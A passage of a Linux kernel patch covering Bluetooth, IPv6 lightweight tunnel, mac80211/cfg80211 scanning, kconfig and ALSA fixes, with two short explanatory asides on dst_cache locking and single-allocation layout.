+-	__le16 policy = cpu_to_le16(opt);
+-
+-	BT_DBG("%s %x", req->hdev->name, policy);
+-
+-	/* Default link policy */
+-	hci_req_add(req, HCI_OP_WRITE_DEF_LINK_POLICY, 2, &policy);
+-	return 0;
+-}
+-
+ /* Get HCI device by index.
+  * Device is held on return. */
+ struct hci_dev *hci_dev_get(int index)
+@@ -733,6 +689,7 @@ int hci_dev_cmd(unsigned int cmd, void __user *arg)
+ {
+ 	struct hci_dev *hdev;
+ 	struct hci_dev_req dr;
++	__le16 policy;
+ 	int err = 0;
+ 
+ 	if (copy_from_user(&dr, arg, sizeof(dr)))
+@@ -764,8 +721,8 @@ int hci_dev_cmd(unsigned int cmd, void __user *arg)
+ 
+ 	switch (cmd) {
+ 	case HCISETAUTH:
+-		err = hci_req_sync(hdev, hci_auth_req, dr.dev_opt,
+-				   HCI_INIT_TIMEOUT, NULL);
++		err = __hci_cmd_sync_status(hdev, HCI_OP_WRITE_AUTH_ENABLE,
++					    1, &dr.dev_opt, HCI_CMD_TIMEOUT);
+ 		break;
+ 
+ 	case HCISETENCRYPT:
+@@ -776,19 +733,23 @@ int hci_dev_cmd(unsigned int cmd, void __user *arg)
+ 
+ 		if (!test_bit(HCI_AUTH, &hdev->flags)) {
+ 			/* Auth must be enabled first */
+-			err = hci_req_sync(hdev, hci_auth_req, dr.dev_opt,
+-					   HCI_INIT_TIMEOUT, NULL);
++			err = __hci_cmd_sync_status(hdev,
++						    HCI_OP_WRITE_AUTH_ENABLE,
++						    1, &dr.dev_opt,
++						    HCI_CMD_TIMEOUT);
+ 			if (err)
+ 				break;
+ 		}
+ 
+-		err = hci_req_sync(hdev, hci_encrypt_req, dr.dev_opt,
+-				   HCI_INIT_TIMEOUT, NULL);
++		err = __hci_cmd_sync_status(hdev, HCI_OP_WRITE_ENCRYPT_MODE,
++					    1, &dr.dev_opt,
++					    HCI_CMD_TIMEOUT);
+ 		break;
+ 
+ 	case HCISETSCAN:
+-		err = hci_req_sync(hdev, hci_scan_req, dr.dev_opt,
+-				   HCI_INIT_TIMEOUT, NULL);
++		err = __hci_cmd_sync_status(hdev, HCI_OP_WRITE_SCAN_ENABLE,
++					    1, &dr.dev_opt,
++					    HCI_CMD_TIMEOUT);
+ 
+ 		/* Ensure that the connectable and discoverable states
+ 		 * get correctly modified as this was a non-mgmt change.
+@@ -798,8 +759,11 @@ int hci_dev_cmd(unsigned int cmd, void __user *arg)
+ 		break;
+ 
+ 	case HCISETLINKPOL:
+-		err = hci_req_sync(hdev, hci_linkpol_req, dr.dev_opt,
+-				   HCI_INIT_TIMEOUT, NULL);
++		policy = cpu_to_le16(dr.dev_opt);
++
++		err = __hci_cmd_sync_status(hdev, HCI_OP_WRITE_DEF_LINK_POLICY,
++					    2, &policy,
++					    HCI_CMD_TIMEOUT);
+ 		break;
+ 
+ 	case HCISETLINKMODE:
+@@ -2727,7 +2691,11 @@ void hci_unregister_dev(struct hci_dev *hdev)
+ 	list_del(&hdev->list);
+ 	write_unlock(&hci_dev_list_lock);
+ 
++	cancel_work_sync(&hdev->rx_work);
++	cancel_work_sync(&hdev->cmd_work);
++	cancel_work_sync(&hdev->tx_work);
+ 	cancel_work_sync(&hdev->power_on);
++	cancel_work_sync(&hdev->error_reset);
+ 
+ 	hci_cmd_sync_clear(hdev);
+ 
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index e24b211b10ff5..57302021b7ebb 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -279,6 +279,19 @@ int __hci_cmd_sync_status(struct hci_dev *hdev, u16 opcode, u32 plen,
+ }
+ EXPORT_SYMBOL(__hci_cmd_sync_status);
+ 
++int hci_cmd_sync_status(struct hci_dev *hdev, u16 opcode, u32 plen,
++			const void *param, u32 timeout)
++{
++	int err;
++
++	hci_req_sync_lock(hdev);
++	err = __hci_cmd_sync_status(hdev, opcode, plen, param, timeout);
++	hci_req_sync_unlock(hdev);
++
++	return err;
++}
++EXPORT_SYMBOL(hci_cmd_sync_status);
++
+ static void hci_cmd_sync_work(struct work_struct *work)
+ {
+ 	struct hci_dev *hdev = container_of(work, struct hci_dev, cmd_sync_work);
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index a204488a21759..98dabbbe42938 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -7798,6 +7798,8 @@ static void l2cap_conless_channel(struct l2cap_conn *conn, __le16 psm,
+ 
+ 	BT_DBG("chan %p, len %d", chan, skb->len);
+ 
++	l2cap_chan_lock(chan);
++
+ 	if (chan->state != BT_BOUND && chan->state != BT_CONNECTED)
+ 		goto drop;
+ 
+@@ -7814,6 +7816,7 @@ static void l2cap_conless_channel(struct l2cap_conn *conn, __le16 psm,
+ 	}
+ 
+ drop:
++	l2cap_chan_unlock(chan);
+ 	l2cap_chan_put(chan);
+ free_skb:
+ 	kfree_skb(skb);
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index af6d4e3b8c065..b17782dc513b5 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -1273,6 +1273,10 @@ static void l2cap_sock_kill(struct sock *sk)
+ 
+ 	BT_DBG("sk %p state %s", sk, state_to_string(sk->sk_state));
+ 
++	/* The sock is dead, so set chan->data to NULL to keep other tasks
++	 * from using the invalid sock pointer.
++	 */
++	l2cap_pi(sk)->chan->data = NULL;
+ 	/* Kill poor orphan */
+ 
+ 	l2cap_chan_put(l2cap_pi(sk)->chan);
+@@ -1515,12 +1519,16 @@ static struct l2cap_chan *l2cap_sock_new_connection_cb(struct l2cap_chan *chan)
+ 
+ static int l2cap_sock_recv_cb(struct l2cap_chan *chan, struct sk_buff *skb)
+ {
+-	struct sock *sk = chan->data;
+-	struct l2cap_pinfo *pi = l2cap_pi(sk);
++	struct sock *sk;
++	struct l2cap_pinfo *pi;
+ 	int err;
+ 
+-	lock_sock(sk);
++	sk = chan->data;
++	if (!sk)
++		return -ENXIO;
+ 
++	pi = l2cap_pi(sk);
++	lock_sock(sk);
+ 	if (chan->mode == L2CAP_MODE_ERTM && !list_empty(&pi->rx_busy)) {
+ 		err = -ENOMEM;
+ 		goto done;
+diff --git a/net/ipv6/ila/ila_lwt.c b/net/ipv6/ila/ila_lwt.c
+index 8c1ce78956bae..9d37f7164e732 100644
+--- a/net/ipv6/ila/ila_lwt.c
++++ b/net/ipv6/ila/ila_lwt.c
+@@ -58,7 +58,9 @@ static int ila_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 		return orig_dst->lwtstate->orig_output(net, sk, skb);
+ 	}
+ 
++	local_bh_disable();
+ 	dst = dst_cache_get(&ilwt->dst_cache);
++	local_bh_enable();
+ 	if (unlikely(!dst)) {
+ 		struct ipv6hdr *ip6h = ipv6_hdr(skb);
+ 		struct flowi6 fl6;
+@@ -86,8 +88,11 @@ static int ila_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 			goto drop;
+ 		}
+ 
+-		if (ilwt->connected)
++		if (ilwt->connected) {
++			local_bh_disable();
+ 			dst_cache_set_ip6(&ilwt->dst_cache, dst, &fl6.saddr);
++			local_bh_enable();
++		}
+ 	}
+ 
+ 	skb_dst_set(skb, dst);
+diff --git a/net/ipv6/rpl_iptunnel.c b/net/ipv6/rpl_iptunnel.c
+index ff691d9f4a04f..26adbe7f8a2f0 100644
+--- a/net/ipv6/rpl_iptunnel.c
++++ b/net/ipv6/rpl_iptunnel.c
+@@ -212,9 +212,9 @@ static int rpl_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 	if (unlikely(err))
+ 		goto drop;
+ 
+-	preempt_disable();
++	local_bh_disable();
+ 	dst = dst_cache_get(&rlwt->cache);
+-	preempt_enable();
++	local_bh_enable();
+ 
+ 	if (unlikely(!dst)) {
+ 		struct ipv6hdr *hdr = ipv6_hdr(skb);
+@@ -234,9 +234,9 @@ static int rpl_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 			goto drop;
+ 		}
+ 
+-		preempt_disable();
++		local_bh_disable();
+ 		dst_cache_set_ip6(&rlwt->cache, dst, &fl6.saddr);
+-		preempt_enable();
++		local_bh_enable();
+ 	}
+ 
+ 	skb_dst_drop(skb);
+@@ -268,9 +268,8 @@ static int rpl_input(struct sk_buff *skb)
+ 		return err;
+ 	}
+ 
+-	preempt_disable();
++	local_bh_disable();
+ 	dst = dst_cache_get(&rlwt->cache);
+-	preempt_enable();
+ 
+ 	skb_dst_drop(skb);
+ 
+@@ -278,14 +277,13 @@ static int rpl_input(struct sk_buff *skb)
+ 		ip6_route_input(skb);
+ 		dst = skb_dst(skb);
+ 		if (!dst->error) {
+-			preempt_disable();
+ 			dst_cache_set_ip6(&rlwt->cache, dst,
+ 					  &ipv6_hdr(skb)->saddr);
+-			preempt_enable();
+ 		}
+ 	} else {
+ 		skb_dst_set(skb, dst);
+ 	}
++	local_bh_enable();
+ 
+ 	err = skb_cow_head(skb, LL_RESERVED_SPACE(dst->dev));
+ 	if (unlikely(err))
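
Both the ila and rpl hunks converge on the same rule: dst_cache keeps per-CPU entries that are also touched from softirq context, so lookups and updates must run with softirqs masked -- local_bh_disable(), not preempt_disable(), which does not keep a softirq on the same CPU out of the critical section. A minimal sketch of the access pattern (demo wrapper, not a real caller):

	/* Illustrative only -- the shape of a safe dst_cache lookup. */
	#include <net/dst_cache.h>

	static struct dst_entry *demo_get_cached(struct dst_cache *cache)
	{
		struct dst_entry *dst;

		local_bh_disable();	/* per-CPU cache: keep softirqs off this CPU */
		dst = dst_cache_get(cache);
		local_bh_enable();

		return dst;
	}
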
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 1e57027da2913..2c60fc165801c 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -2838,8 +2838,9 @@ static int ieee80211_set_mcast_rate(struct wiphy *wiphy, struct net_device *dev,
+ 	memcpy(sdata->vif.bss_conf.mcast_rate, rate,
+ 	       sizeof(int) * NUM_NL80211_BANDS);
+ 
+-	ieee80211_link_info_change_notify(sdata, &sdata->deflink,
+-					  BSS_CHANGED_MCAST_RATE);
++	if (ieee80211_sdata_running(sdata))
++		ieee80211_link_info_change_notify(sdata, &sdata->deflink,
++						  BSS_CHANGED_MCAST_RATE);
+ 
+ 	return 0;
+ }
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index 3e14d5c9aa1b4..0d8a9bb925384 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -1782,6 +1782,8 @@ void ieee80211_link_info_change_notify(struct ieee80211_sub_if_data *sdata,
+ void ieee80211_configure_filter(struct ieee80211_local *local);
+ u32 ieee80211_reset_erp_info(struct ieee80211_sub_if_data *sdata);
+ 
++void ieee80211_handle_queued_frames(struct ieee80211_local *local);
++
+ u64 ieee80211_mgmt_tx_cookie(struct ieee80211_local *local);
+ int ieee80211_attach_ack_skb(struct ieee80211_local *local, struct sk_buff *skb,
+ 			     u64 *cookie, gfp_t gfp);
+diff --git a/net/mac80211/main.c b/net/mac80211/main.c
+index 6faba47b7b0ea..1eec4e2eb74cc 100644
+--- a/net/mac80211/main.c
++++ b/net/mac80211/main.c
+@@ -300,9 +300,9 @@ u32 ieee80211_reset_erp_info(struct ieee80211_sub_if_data *sdata)
+ 	       BSS_CHANGED_ERP_SLOT;
+ }
+ 
+-static void ieee80211_tasklet_handler(struct tasklet_struct *t)
++/* context: requires softirqs disabled */
++void ieee80211_handle_queued_frames(struct ieee80211_local *local)
+ {
+-	struct ieee80211_local *local = from_tasklet(local, t, tasklet);
+ 	struct sk_buff *skb;
+ 
+ 	while ((skb = skb_dequeue(&local->skb_queue)) ||
+@@ -327,6 +327,13 @@ static void ieee80211_tasklet_handler(struct tasklet_struct *t)
+ 	}
+ }
+ 
++static void ieee80211_tasklet_handler(struct tasklet_struct *t)
++{
++	struct ieee80211_local *local = from_tasklet(local, t, tasklet);
++
++	ieee80211_handle_queued_frames(local);
++}
++
+ static void ieee80211_restart_work(struct work_struct *work)
+ {
+ 	struct ieee80211_local *local =
+diff --git a/net/mac80211/mesh.c b/net/mac80211/mesh.c
+index 5a99b8f6e465f..9c9b47d153c28 100644
+--- a/net/mac80211/mesh.c
++++ b/net/mac80211/mesh.c
+@@ -1625,6 +1625,7 @@ void ieee80211_mesh_init_sdata(struct ieee80211_sub_if_data *sdata)
+ 	ifmsh->last_preq = jiffies;
+ 	ifmsh->next_perr = jiffies;
+ 	ifmsh->csa_role = IEEE80211_MESH_CSA_ROLE_NONE;
++	ifmsh->nonpeer_pm = NL80211_MESH_POWER_ACTIVE;
+ 	/* Allocate all mesh structures when creating the first mesh interface. */
+ 	if (!mesh_allocated)
+ 		ieee80211s_init();
+diff --git a/net/mac80211/scan.c b/net/mac80211/scan.c
+index 933d02d7c1284..62c22ff329ad4 100644
+--- a/net/mac80211/scan.c
++++ b/net/mac80211/scan.c
+@@ -733,15 +733,21 @@ static int __ieee80211_start_scan(struct ieee80211_sub_if_data *sdata,
+ 			local->hw_scan_ies_bufsize *= n_bands;
+ 		}
+ 
+-		local->hw_scan_req = kmalloc(
+-				sizeof(*local->hw_scan_req) +
+-				req->n_channels * sizeof(req->channels[0]) +
+-				local->hw_scan_ies_bufsize, GFP_KERNEL);
++		local->hw_scan_req = kmalloc(struct_size(local->hw_scan_req,
++							 req.channels,
++							 req->n_channels) +
++					     local->hw_scan_ies_bufsize,
++					     GFP_KERNEL);
+ 		if (!local->hw_scan_req)
+ 			return -ENOMEM;
+ 
+ 		local->hw_scan_req->req.ssids = req->ssids;
+ 		local->hw_scan_req->req.n_ssids = req->n_ssids;
++		/* None of the channels are actually set
++		 * up but let UBSAN know the boundaries.
++		 */
++		local->hw_scan_req->req.n_channels = req->n_channels;
++
+ 		ies = (u8 *)local->hw_scan_req +
+ 			sizeof(*local->hw_scan_req) +
+ 			req->n_channels * sizeof(req->channels[0]);
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 1088d90e355ba..738f1f139a90e 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -2207,6 +2207,10 @@ u32 ieee80211_sta_get_rates(struct ieee80211_sub_if_data *sdata,
+ 
+ void ieee80211_stop_device(struct ieee80211_local *local)
+ {
++	local_bh_disable();
++	ieee80211_handle_queued_frames(local);
++	local_bh_enable();
++
+ 	ieee80211_led_radio(local, false);
+ 	ieee80211_mod_tpt_led_trig(local, 0, IEEE80211_TPT_LEDTRIG_FL_RADIO);
+ 
+diff --git a/net/mac802154/tx.c b/net/mac802154/tx.c
+index c829e4a753256..7cea95d0b78f9 100644
+--- a/net/mac802154/tx.c
++++ b/net/mac802154/tx.c
+@@ -34,8 +34,8 @@ void ieee802154_xmit_worker(struct work_struct *work)
+ 	if (res)
+ 		goto err_tx;
+ 
+-	dev->stats.tx_packets++;
+-	dev->stats.tx_bytes += skb->len;
++	DEV_STATS_INC(dev, tx_packets);
++	DEV_STATS_ADD(dev, tx_bytes, skb->len);
+ 
+ 	ieee802154_xmit_complete(&local->hw, skb, false);
+ 
+@@ -86,8 +86,8 @@ ieee802154_tx(struct ieee802154_local *local, struct sk_buff *skb)
+ 			goto err_tx;
+ 		}
+ 
+-		dev->stats.tx_packets++;
+-		dev->stats.tx_bytes += len;
++		DEV_STATS_INC(dev, tx_packets);
++		DEV_STATS_ADD(dev, tx_bytes, len);
+ 	} else {
+ 		local->tx_skb = skb;
+ 		queue_work(local->workqueue, &local->tx_work);
+diff --git a/net/wireless/rdev-ops.h b/net/wireless/rdev-ops.h
+index ee853a14a02de..5f210686c4110 100644
+--- a/net/wireless/rdev-ops.h
++++ b/net/wireless/rdev-ops.h
+@@ -2,7 +2,7 @@
+ /*
+  * Portions of this file
+  * Copyright(c) 2016-2017 Intel Deutschland GmbH
+- * Copyright (C) 2018, 2021-2023 Intel Corporation
++ * Copyright (C) 2018, 2021-2024 Intel Corporation
+  */
+ #ifndef __CFG80211_RDEV_OPS
+ #define __CFG80211_RDEV_OPS
+@@ -446,6 +446,10 @@ static inline int rdev_scan(struct cfg80211_registered_device *rdev,
+ 			    struct cfg80211_scan_request *request)
+ {
+ 	int ret;
++
++	if (WARN_ON_ONCE(!request->n_ssids && request->ssids))
++		return -EINVAL;
++
+ 	trace_rdev_scan(&rdev->wiphy, request);
+ 	ret = rdev->ops->scan(&rdev->wiphy, request);
+ 	trace_rdev_return_int(&rdev->wiphy, ret);
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
+index 3ad4c1032c038..3cd162e53173b 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -778,6 +778,7 @@ static int cfg80211_scan_6ghz(struct cfg80211_registered_device *rdev)
+ 	LIST_HEAD(coloc_ap_list);
+ 	bool need_scan_psc = true;
+ 	const struct ieee80211_sband_iftype_data *iftd;
++	size_t size, offs_ssids, offs_6ghz_params, offs_ies;
+ 
+ 	rdev_req->scan_6ghz = true;
+ 
+@@ -806,10 +807,15 @@ static int cfg80211_scan_6ghz(struct cfg80211_registered_device *rdev)
+ 		spin_unlock_bh(&rdev->bss_lock);
+ 	}
+ 
+-	request = kzalloc(struct_size(request, channels, n_channels) +
+-			  sizeof(*request->scan_6ghz_params) * count +
+-			  sizeof(*request->ssids) * rdev_req->n_ssids,
+-			  GFP_KERNEL);
++	size = struct_size(request, channels, n_channels);
++	offs_ssids = size;
++	size += sizeof(*request->ssids) * rdev_req->n_ssids;
++	offs_6ghz_params = size;
++	size += sizeof(*request->scan_6ghz_params) * count;
++	offs_ies = size;
++	size += rdev_req->ie_len;
++
++	request = kzalloc(size, GFP_KERNEL);
+ 	if (!request) {
+ 		cfg80211_free_coloc_ap_list(&coloc_ap_list);
+ 		return -ENOMEM;
+@@ -817,8 +823,26 @@ static int cfg80211_scan_6ghz(struct cfg80211_registered_device *rdev)
+ 
+ 	*request = *rdev_req;
+ 	request->n_channels = 0;
+-	request->scan_6ghz_params =
+-		(void *)&request->channels[n_channels];
++	request->n_6ghz_params = 0;
++	if (rdev_req->n_ssids) {
++		/*
++		 * Add the ssids from the parent scan request to the new
++		 * scan request, so the driver would be able to use them
++		 * in its probe requests to discover hidden APs on PSC
++		 * channels.
++		 */
++		request->ssids = (void *)request + offs_ssids;
++		memcpy(request->ssids, rdev_req->ssids,
++		       sizeof(*request->ssids) * request->n_ssids);
++	}
++	request->scan_6ghz_params = (void *)request + offs_6ghz_params;
++
++	if (rdev_req->ie_len) {
++		void *ie = (void *)request + offs_ies;
++
++		memcpy(ie, rdev_req->ie, rdev_req->ie_len);
++		request->ie = ie;
++	}
+ 
+ 	/*
+ 	 * PSC channels should not be scanned in case of direct scan with 1 SSID
+@@ -906,17 +930,8 @@ static int cfg80211_scan_6ghz(struct cfg80211_registered_device *rdev)
+ 
+ 	if (request->n_channels) {
+ 		struct cfg80211_scan_request *old = rdev->int_scan_req;
+-		rdev->int_scan_req = request;
+ 
+-		/*
+-		 * Add the ssids from the parent scan request to the new scan
+-		 * request, so the driver would be able to use them in its
+-		 * probe requests to discover hidden APs on PSC channels.
+-		 */
+-		request->ssids = (void *)&request->channels[request->n_channels];
+-		request->n_ssids = rdev_req->n_ssids;
+-		memcpy(request->ssids, rdev_req->ssids, sizeof(*request->ssids) *
+-		       request->n_ssids);
++		rdev->int_scan_req = request;
+ 
+ 		/*
+ 		 * If this scan follows a previous scan, save the scan start
+@@ -2704,10 +2719,14 @@ int cfg80211_wext_siwscan(struct net_device *dev,
+ 	wiphy = &rdev->wiphy;
+ 
+ 	/* Determine number of channels, needed to allocate creq */
+-	if (wreq && wreq->num_channels)
++	if (wreq && wreq->num_channels) {
++		/* Passed from userspace so should be checked */
++		if (unlikely(wreq->num_channels > IW_MAX_FREQUENCIES))
++			return -EINVAL;
+ 		n_channels = wreq->num_channels;
+-	else
++	} else {
+ 		n_channels = ieee80211_get_num_supported_channels(wiphy);
++	}
+ 
+ 	creq = kzalloc(sizeof(*creq) + sizeof(struct cfg80211_ssid) +
+ 		       n_channels * sizeof(void *),
+@@ -2781,8 +2800,10 @@ int cfg80211_wext_siwscan(struct net_device *dev,
+ 			memcpy(creq->ssids[0].ssid, wreq->essid, wreq->essid_len);
+ 			creq->ssids[0].ssid_len = wreq->essid_len;
+ 		}
+-		if (wreq->scan_type == IW_SCAN_TYPE_PASSIVE)
++		if (wreq->scan_type == IW_SCAN_TYPE_PASSIVE) {
++			creq->ssids = NULL;
+ 			creq->n_ssids = 0;
++		}
+ 	}
+ 
+ 	for (i = 0; i < NUM_NL80211_BANDS; i++)
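
The rewritten allocation above sizes one blob for the request plus its variable-length tails (SSIDs, 6 GHz params, IEs) and records each tail's offset before the kzalloc(), so every derived pointer stays inside the single allocation however the counts vary. A minimal sketch of the same carve-out pattern with a demo struct (not the real cfg80211_scan_request layout):

	/* Illustrative only -- one allocation, several trailing regions. */
	#include <linux/slab.h>

	struct demo_req {
		size_t n_vals;
		int *vals;		/* first trailing array */
		char *blob;		/* second trailing region */
		size_t blob_len;
	};

	static struct demo_req *demo_alloc(size_t n_vals, size_t blob_len)
	{
		size_t size = sizeof(struct demo_req), offs_vals, offs_blob;
		struct demo_req *req;

		offs_vals = size;
		size += sizeof(int) * n_vals;
		offs_blob = size;
		size += blob_len;

		req = kzalloc(size, GFP_KERNEL);
		if (!req)
			return NULL;

		req->vals = (void *)req + offs_vals;	/* GNU void * arithmetic, as in the patch */
		req->blob = (void *)req + offs_blob;
		req->n_vals = n_vals;
		req->blob_len = blob_len;
		return req;
	}
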
+diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
+index 84c730da36dd3..1ae39b9f4a95e 100644
+--- a/scripts/gcc-plugins/gcc-common.h
++++ b/scripts/gcc-plugins/gcc-common.h
+@@ -440,4 +440,8 @@ static inline void debug_gimple_stmt(const_gimple s)
+ #define SET_DECL_MODE(decl, mode)	DECL_MODE(decl) = (mode)
+ #endif
+ 
++#if BUILDING_GCC_VERSION >= 14000
++#define last_stmt(x)			last_nondebug_stmt(x)
++#endif
++
+ #endif
+diff --git a/scripts/kconfig/expr.c b/scripts/kconfig/expr.c
+index 81ebf8108ca74..81dfdf4470f75 100644
+--- a/scripts/kconfig/expr.c
++++ b/scripts/kconfig/expr.c
+@@ -396,35 +396,6 @@ static struct expr *expr_eliminate_yn(struct expr *e)
+ 	return e;
+ }
+ 
+-/*
+- * bool FOO!=n => FOO
+- */
+-struct expr *expr_trans_bool(struct expr *e)
+-{
+-	if (!e)
+-		return NULL;
+-	switch (e->type) {
+-	case E_AND:
+-	case E_OR:
+-	case E_NOT:
+-		e->left.expr = expr_trans_bool(e->left.expr);
+-		e->right.expr = expr_trans_bool(e->right.expr);
+-		break;
+-	case E_UNEQUAL:
+-		// FOO!=n -> FOO
+-		if (e->left.sym->type == S_TRISTATE) {
+-			if (e->right.sym == &symbol_no) {
+-				e->type = E_SYMBOL;
+-				e->right.sym = NULL;
+-			}
+-		}
+-		break;
+-	default:
+-		;
+-	}
+-	return e;
+-}
+-
+ /*
+  * e1 || e2 -> ?
+  */
+diff --git a/scripts/kconfig/expr.h b/scripts/kconfig/expr.h
+index 9c9caca5bd5f2..c91060e19e477 100644
+--- a/scripts/kconfig/expr.h
++++ b/scripts/kconfig/expr.h
+@@ -296,7 +296,6 @@ void expr_free(struct expr *e);
+ void expr_eliminate_eq(struct expr **ep1, struct expr **ep2);
+ int expr_eq(struct expr *e1, struct expr *e2);
+ tristate expr_calc_value(struct expr *e);
+-struct expr *expr_trans_bool(struct expr *e);
+ struct expr *expr_eliminate_dups(struct expr *e);
+ struct expr *expr_transform(struct expr *e);
+ int expr_contains_symbol(struct expr *dep, struct symbol *sym);
+diff --git a/scripts/kconfig/gconf.c b/scripts/kconfig/gconf.c
+index 17adabfd6e6bf..5d1404178e482 100644
+--- a/scripts/kconfig/gconf.c
++++ b/scripts/kconfig/gconf.c
+@@ -1481,7 +1481,6 @@ int main(int ac, char *av[])
+ 
+ 	conf_parse(name);
+ 	fixup_rootmenu(&rootmenu);
+-	conf_read(NULL);
+ 
+ 	/* Load the interface and connect signals */
+ 	init_main_window(glade_file);
+@@ -1489,6 +1488,8 @@ int main(int ac, char *av[])
+ 	init_left_tree();
+ 	init_right_tree();
+ 
++	conf_read(NULL);
++
+ 	switch (view_mode) {
+ 	case SINGLE_VIEW:
+ 		display_tree_part();
+diff --git a/scripts/kconfig/menu.c b/scripts/kconfig/menu.c
+index 109325f31bef3..9d4c3f366a061 100644
+--- a/scripts/kconfig/menu.c
++++ b/scripts/kconfig/menu.c
+@@ -380,8 +380,6 @@ void menu_finalize(struct menu *parent)
+ 				dep = expr_transform(dep);
+ 				dep = expr_alloc_and(expr_copy(basedep), dep);
+ 				dep = expr_eliminate_dups(dep);
+-				if (menu->sym && menu->sym->type != S_TRISTATE)
+-					dep = expr_trans_bool(dep);
+ 				prop->visible.expr = dep;
+ 
+ 				/*
+diff --git a/sound/core/pcm_dmaengine.c b/sound/core/pcm_dmaengine.c
+index 494ec0c207fad..e299e8634751f 100644
+--- a/sound/core/pcm_dmaengine.c
++++ b/sound/core/pcm_dmaengine.c
+@@ -349,6 +349,16 @@ int snd_dmaengine_pcm_open_request_chan(struct snd_pcm_substream *substream,
+ }
+ EXPORT_SYMBOL_GPL(snd_dmaengine_pcm_open_request_chan);
+ 
++int snd_dmaengine_pcm_sync_stop(struct snd_pcm_substream *substream)
++{
++	struct dmaengine_pcm_runtime_data *prtd = substream_to_prtd(substream);
++
++	dmaengine_synchronize(prtd->dma_chan);
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(snd_dmaengine_pcm_sync_stop);
++
+ /**
+  * snd_dmaengine_pcm_close - Close a dmaengine based PCM substream
+  * @substream: PCM substream
+@@ -358,6 +368,12 @@ EXPORT_SYMBOL_GPL(snd_dmaengine_pcm_open_request_chan);
+ int snd_dmaengine_pcm_close(struct snd_pcm_substream *substream)
+ {
+ 	struct dmaengine_pcm_runtime_data *prtd = substream_to_prtd(substream);
++	struct dma_tx_state state;
++	enum dma_status status;
++
++	status = dmaengine_tx_status(prtd->dma_chan, prtd->cookie, &state);
++	if (status == DMA_PAUSED)
++		dmaengine_terminate_async(prtd->dma_chan);
+ 
+ 	dmaengine_synchronize(prtd->dma_chan);
+ 	kfree(prtd);
+@@ -378,6 +394,12 @@ EXPORT_SYMBOL_GPL(snd_dmaengine_pcm_close);
+ int snd_dmaengine_pcm_close_release_chan(struct snd_pcm_substream *substream)
+ {
+ 	struct dmaengine_pcm_runtime_data *prtd = substream_to_prtd(substream);
++	struct dma_tx_state state;
++	enum dma_status status;
++
++	status = dmaengine_tx_status(prtd->dma_chan, prtd->cookie, &state);
++	if (status == DMA_PAUSED)
++		dmaengine_terminate_async(prtd->dma_chan);
+ 
+ 	dmaengine_synchronize(prtd->dma_chan);
+ 	dma_release_channel(prtd->dma_chan);
+diff --git a/sound/core/pcm_native.c b/sound/core/pcm_native.c
+index 9238abbfb2d62..2b73518e5e314 100644
+--- a/sound/core/pcm_native.c
++++ b/sound/core/pcm_native.c
+@@ -1781,6 +1781,8 @@ static int snd_pcm_pre_resume(struct snd_pcm_substream *substream,
+ 			      snd_pcm_state_t state)
+ {
+ 	struct snd_pcm_runtime *runtime = substream->runtime;
++	if (runtime->state != SNDRV_PCM_STATE_SUSPENDED)
++		return -EBADFD;
+ 	if (!(runtime->info & SNDRV_PCM_INFO_RESUME))
+ 		return -ENOSYS;
+ 	runtime->trigger_master = substream;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 06f00819d1a8a..66b8adb2069af 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -583,10 +583,14 @@ static void alc_shutup_pins(struct hda_codec *codec)
+ 	switch (codec->core.vendor_id) {
+ 	case 0x10ec0236:
+ 	case 0x10ec0256:
++	case 0x10ec0257:
+ 	case 0x19e58326:
+ 	case 0x10ec0283:
++	case 0x10ec0285:
+ 	case 0x10ec0286:
++	case 0x10ec0287:
+ 	case 0x10ec0288:
++	case 0x10ec0295:
+ 	case 0x10ec0298:
+ 		alc_headset_mic_no_shutup(codec);
+ 		break;
+@@ -9697,6 +9701,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8788, "HP OMEN 15", ALC285_FIXUP_HP_MUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87b7, "HP Laptop 14-fq0xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x87c8, "HP", ALC287_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x87d3, "HP Laptop 15-gw0xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x87e5, "HP ProBook 440 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87e7, "HP ProBook 450 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87f1, "HP ProBook 630 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 0568e64d10150..8e3eccb4faa72 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
